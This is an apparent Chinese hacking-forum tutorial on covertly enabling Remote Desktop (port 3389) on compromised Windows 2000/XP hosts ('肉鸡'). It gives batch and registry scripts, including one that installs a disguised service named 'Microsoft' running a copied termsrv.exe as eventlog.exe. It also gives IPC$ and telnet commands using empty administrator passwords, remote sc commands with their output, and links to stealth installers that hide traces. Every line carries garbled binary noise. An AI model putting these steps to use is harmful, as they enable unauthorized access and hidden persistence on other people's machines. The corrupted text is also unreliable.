[hide=60] 1.打开记事本,编辑内容如下:
7J|VD#DE$Y echo [Components] > c:\sql
�/D^"X
4!" echo TSEnable = on >> c:\sql
�Eu-RNrYh# sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
��Nwt" \3 编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
^A��u� _�U +�
33@?fl. 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
T�[4<R 5}� 地址:
www.netsill.com/rots.zip �Yd=�a}T� 使用方法:
F;[T#N:��~ 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
\ZhfgE8�{% @@r��Es40� c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
@`�E�g(� <�Ib[82PU� 服务端口: 设置终端服务的服务端口。默认是3389。
:�.d:9Z�|_ 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
J9O�u+6�u( 使用/fr表示强制重起目标。(如果/r不行,可以允哉飧觯?BR>使用此参数时,端口设置不能忽略。
{g~bQ2�wDC 比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
�ivz>dJ�?T 运行CMD(2000下的DOS),我们给它开终端!
'd�&0�Js$^ 命令如下!
=�;|QZ"%E� cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
'�GoZqiYT� 上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以 /r,这是普通重启)
��MR,R}B$ �HJ[/|NZU$ 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
3g~^[&�|i� 因为pro版不能安装终端服务。
�0}�FOV`n� 如果你确信脚本判断错误,就继续安装好了。
Ts�U�OpEuX ��,H���2D 如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
k`9)=&zX+� a/�U2xq{�x 脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
�d]i(h~?_� �a�Kl�UX� <�g�gtjw S 3,下载3389自动安装程序-djshao正式版5.0
L��IVU^Os. 地址
www.netsill.com/djshao.zip �G0{H5_h�� 说明:
V�&|Ed�� 解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\ winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!
�EVUq�--)~ ELjK0pE}-� 特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持非法内容,请删除韩繁四个版本的win2000服务器版!
lz�0TK)kuC z�rv#Xa!O\ $DC*i-}qFg 4.下载DameWare NT Utilities 3.66.0.0 注册版
fr}Eaa-{�^ 地址
www.netsill.com/dwmrcw36600.zip 2Nm>����5l 安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
|*X*n*�o�I 复制启动后出现对方桌面。
je4��w=]JV 在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK。
��|U��k"
{ 7�HJS�.047 ~�!d/8?!�� 5.
-l-E_6�|/W ~i_T�w#}�� 首先我们制作开启3389的工具
u=NS�sTP�& 先把下面的注册表内容copy一份,另存为3389.reg注册表文件
0�\~Z5k`IT 注册表内容:
J�.+BD\pa� Windows Registry Editor Version 5.00
bo=�ZM�9�� [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
%tt��%��`0 "Enabled"="0"
g3�sUl&K [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
nGf);U#��K "ShutdownWithoutLogon"="0"
vF/ =��J� [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
cZ+7.oD��u "EnableAdminTSRemote"=dword:00000001
)V�k�6;__� [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
4Kv[�e]10( "TSEnabled"=dword:00000001
|nk�3^�;Yf [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
�W*:,m8wk� "Start"=dword:00000002
�'s!-80�sd [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
�3�PU��AH� "Hotkey"="1"
R��F!1��oZ [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
x/�MZ�(A%D "Start"=dword:00000002
@C-dG7U�.P "ErrorControl"=dword:00000001
�&>jAe_{", "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
Tf�Z6F�8|B 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
rba�;�&D;� 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
�|�m?vV�Lq "ObjectName"="LocalSystem"
q�y!�O�u3^ "Type"=dword:00000010
"?�Ge�b�A� "Description"="Microsoft"
>�7�U>Y��h "DisplayName"="Microsoft"
Bl1Z�4` 3� 再把下面的内容保存为批处理文件3389.bat
-
?!:{UXl� 安装批处理内容:
k�K�~I��wA copy termsrv.exe eventlog.exe
QI[}(�O7#6 regedit.exe /s 3389.reg
1GE�|W�d�� del 3389.reg
TE-;X,gDV_ del 3389.exe
8Chu"PM%-J del 3389.bat
cQZ65��2F9 用winrar制作成exe自解压缩包
m����>e3vu h?�yG<>w�I 61.188.***.*** user:administrato pass:空
{�sv{847V 先使用工具letmein判断其操作系统
��A~{f/%8D letmein \\ip -all -d
�f|a�DTWF� TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
]&i�+!$N�_ 再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
�=OV�2��uq 应该没有开启了
�W*�xX{$NL 建立ipc连接
3��|@t%��K copy工具过去
=��j
/�h�l net use \\ip\ipc$ "pass" /user:name
t�llB�CuAe copy file \\ip\admin$\system32
#G,X�DW2"w 用opentelnet开对方的telnet
g42�R 'E�% opentelnet \\ip name pass 1 99
I(n* _bFq 用telnet进入
?Zyok]�s�� 进入到对方的winnt\system32\
vU/�� D7� 目录
P-JfV�7(O8 解压缩3389.exe
�C@HD(..�# 运行安装批处理3389.bat
kJ: 2;�t=� 现在我们把对方重起一下,用reboot
'�3�k�c�D7 ke.7Zp�2.R f�'dK73Xof s�"0b%0?�A VZA3�I�bK} 7.
`:��-J+<�` 1 �2]f�Qkp 检查对方是否真的禁用了Terminal server
cvAtw�Q�'� C:\>sc \\xxx.xxx.xxx.xxx qc termservice
�ZZ
�A�.a� [SC] GetServiceConfig SUCCESS
jg�vh[@uB? SERVICE_NAME: termservice
j+7�48QAhh TYPE : 10 WIN32_OWN_PROCESS
g^�o_�\�hp START_TYPE : 4 DISABLED
Wm6dQ�Q;Bj ERROR_CONTROL : 1 NORMAL
5&4F,v[�zp BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
�5���u��rE LOAD_ORDER_GROUP :
z�w:�/!�MS TAG : 0
r2G*�!qK*1 DISPLAY_NAME : Terminal Services
gB�� CC��� DEPENDENCIES :
U
\�Dca&�= SERVICE_START_NAME : LocalSystem
;x>;jS.��t 仔细看 START_TYPE一项,显示对方该服务的启动模式为“DISABLED”也就是“禁用”。
"zZ&�n3=@ z(d4)z 8'6 2u�o8j�F.h C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto
{u]CHN�`%Z [SC] ChangeServiceConfig SUCCESS
^L�~ [��+| 好了,现在我们已经把对方终端服务的启动模式修改成自动了。
L/k40cEI^z �tvWH04T�� �HRRngk#lV -�i�Qs�i4� 再检查一便对方终端服务的启动模式
@��bQ!zC�I C:\>sc \\TEST qc termservice
q=���[U�}{ [SC] GetServiceConfig SUCCESS
oBUh]sR{�. SERVICE_NAME: termservice
O`[]x�s��� TYPE : 10 WIN32_OWN_PROCESS
R�k[8Bd?�
START_TYPE : 2 AUTO_START
f�
sX;�Nj] ERROR_CONTROL : 1 NORMAL
��^X;JT=r� BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
�3Bd4
C]E LOAD_ORDER_GROUP :
z�`9l<�Q�/ TAG : 0
p[�P[#IeL� DISPLAY_NAME : Terminal Services
aT�/�KT,!� DEPENDENCIES :
&kq7g���Cd SERVICE_START_NAME : LocalSystem
��2wOy��}: V9$-�t�whu ?H�xS)Pq�q xucIjPi]�� 启动对方的终端服务
l_sg)Vr/�b C:\>sc \\xxx.xxx.xxx.xxx start termservice
wG���6F�S� SERVICE_NAME: termservice
Hrv)��,Ce� TYPE : 10 WIN32_OWN_PROCESS
,yi2O]5e>! STATE : 2 START_PENDING
= P8�~n2V� (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
InX{�V|CW? WIN32_EXIT_CODE : 0 (0x0)
�@{de$�ODu SERVICE_EXIT_CODE : 0 (0x0)
>�?Qxpqf2 CHECKPOINT : 0x1
1�(F�'~i|5 WAIT_HINT : 0x7530
B�$�EK_�@M [b pwg&Oo� I9s�$bRbT� C:\>sc \\xxx.xxx.xxx.xxx query termservice
D99N#3�6PU SERVICE_NAME: termservice
z��5I^0�' TYPE : 10 WIN32_OWN_PROCESS
H!�^C���2� STATE : 4 RUNNING
~�)!VV��)� (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
K/��A ? ]y WIN32_EXIT_CODE : 0 (0x0)
��mc56��L[ SERVICE_EXIT_CODE : 0 (0x0)
n
K0��h�TQ CHECKPOINT : 0x0
�z�+2u-�jG WAIT_HINT : 0x0[/hide]
